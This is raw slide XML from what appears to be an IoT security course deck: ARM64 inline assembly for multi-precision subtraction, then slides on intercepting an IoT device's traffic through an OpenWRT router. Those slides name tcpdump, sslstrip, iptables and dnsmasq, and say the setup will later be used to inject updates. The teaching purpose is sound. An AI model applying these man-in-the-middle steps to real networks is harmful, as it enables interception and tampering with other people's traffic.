            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7231ED31-9AF9-8740-BC2D-9EF2DF637356}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6472849" y="1080892"/>
            <a:ext cx="5688155" cy="51356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 do borrow subtract</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "1:\n\t"</a:t>
            </a:r>
          </a:p>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 load first operand</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ldr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    x15, [x10,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 load second operand or 0 depending on sb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "mov    x14, 0\n\t"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cbz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    x13, 2f\n\t"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "sub    x13, x13, 1\n\t"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ldr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    x14, [x11,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endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "2:\n\t"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sbcs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>   x16, x15, x14\n\t"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "str    x16, [x9, x8, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>lsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> 3]\n\t"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "add    x8, x8, 1\n\t"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "sub    x12, x12, 1\n\t"</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cbnz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>   x12, 1b\n\t"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    :: [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>] "r" (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>size_a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>), [a] "r" (a), [sb] "r" (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>size_b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>), [b] "r" (b),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>       [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>] "r" (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>size_c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>), [c] "r" (c): );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="252365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97754"/>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3,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provisioning IoT devices and routers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B2A51B-0FBA-9B48-BB38-96DA381D9A59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1008503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4105"/>
            <a:ext cx="11349644" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MITM network traffic on router</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We’ll interact with a router for three purposes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The router is an IoT device itself.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>We can use the router to record information IP traffic from another IoT device using the router as an access point.  This can be used to determine what the IoT device is communicating and will also be used (later) to inject updates.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>To use the router to intercept another IoT device’s traffic, we use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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sslstrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>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We also use two commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to block or modify network traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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dnsmasq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to change DNS queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>To do this, well use a router that runs an open source Linux based router, TP-Link AC1750.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The router runs OpenWRT, described </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B60DB77-2C0D-7543-AAC0-C96A09ADB8CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2624659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76322"/>
            <a:ext cx="11360800" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OpenWRT</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Google Shape;61;p14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415600" y="1773700"/>
            <a:ext cx="11360800" cy="4555200"/>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Open Source embedded Linux distribution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>huge community</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>well documented (Wiki, tutorials)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Most commonly used for routers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>But it can be found also in WiFi speakers, Washing machines, etc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Supports many architectures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Rich software repository thru integrated package manager opkg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Runs on many COTS routers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sometimes even implemented by the router vendors themselves</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Pre-build packages, replaces original firmware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Limitation: some chipsets are poorly supported due to closed source drivers (avoid Broadcom)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C2E972B-0FBB-5D41-B14A-BB7CF51DADD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="de" smtClean="0"/>
              <a:pPr algn="r"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="de" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3683339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115577"/>
            <a:ext cx="11360800" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Selection of Router</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Google Shape;67;p15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415600" y="1662423"/>
            <a:ext cx="11360800" cy="4555200"/>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For full support: do not use Broadcom WiFi chipsets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>prefer Qualcomm Atheros if possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>beware: different revisions under the same model number might have different hardware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>check OpenWRT Hardware Wiki before buying</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Connectivity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2.4 GHz WiFi is sufficient</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
